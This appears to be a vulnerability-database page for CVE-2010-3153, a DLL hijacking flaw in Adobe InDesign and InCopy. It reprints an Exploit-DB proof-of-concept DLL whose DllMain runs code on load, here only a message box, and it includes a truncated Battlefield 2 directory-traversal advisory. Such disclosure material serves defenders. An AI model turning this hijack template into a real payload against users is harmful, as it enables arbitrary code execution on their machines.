CVE-2010-3153
published 2010-08-27CVE-2010-3153: Untrusted search path vulnerability in Adobe InDesign CS4 6.0, InDesign CS5 7.0.2 and earlier, Adobe InDesign Server CS5 7.0.2 and earlier, and Adobe InCopy…
PriorityP354critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
13.56%
96.0th percentile
Untrusted search path vulnerability in Adobe InDesign CS4 6.0, InDesign CS5 7.0.2 and earlier, Adobe InDesign Server CS5 7.0.2 and earlier, and Adobe InCopy CS5 7.0.2 and earlier allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse ibfs32.dll that is located in the same folder as an .indl, .indp, .indt, or .inx file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| adobe | indesign_cs4 | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking
exploitdb·2010-08-25
CVE-2010-3153 Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking
Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking
---
/*
Exploit Title: Adobe InDesign CS4 DLL Hijacking Exploit (ibfs32.dll)
Date: August 25, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Version: CS4 v6.0
Tested on: Windows 7 x64 Ultimate
Vulnerable extensions: .indl .indp .indt .inx
Greetz: Astalavista, OffSEC, Exploit-DB
*/
#include
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_hijack();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
int dll_hijack()
{
MessageBox(0, "Adobe DLL Hijacking!", "DLL Message", MB_OK);
}
Exploit-DB
EA Battlefield 2 / Battlefield 2142 - Multiple Arbitrary File Upload Vulnerabilities
exploitdb·2010-07-08
CVE-2010-2627 EA Battlefield 2 / Battlefield 2142 - Multiple Arbitrary File Upload Vulnerabilities
EA Battlefield 2 / Battlefield 2142 - Multiple Arbitrary File Upload Vulnerabilities
---
Source:
http://aluigi.org/adv/bf2urlz-adv.txt
#######################################################################
Luigi Auriemma
Application: Refractor 2 engine
Games: Battlefield 2 <= 1.50 (aka 1.5.3153-802.0)
http://www.battlefield.ea.com/battlefield/bf2/
Battlefield 2142 <= 1.50 (aka 1.10.48.0)
http://battlefield.ea.com/battlefield/bf2142/
...
other games developed with the same engine could be
vulnerable like Battlefield Heroes
Platforms: Windows
Bug: client URLs directory traversal
Exploitation: remote, versus clients
Date: 29 Jun 2010
Author: Luigi Auriemma
e-mail: [email protected]
web: aluigi.org
#######################################################################
1) Introduc
No writeups or analysis indexed.
http://secunia.com/advisories/41126http://www.adobe.com/support/security/bulletins/apsb10-24.htmlhttp://www.exploit-db.com/exploits/14775/http://www.securityfocus.com/archive/1/513340/100/0/threadedhttp://www.securitytracker.com/id?1024612http://secunia.com/advisories/41126http://www.adobe.com/support/security/bulletins/apsb10-24.htmlhttp://www.exploit-db.com/exploits/14775/http://www.securityfocus.com/archive/1/513340/100/0/threadedhttp://www.securitytracker.com/id?1024612
2010-08-27
Published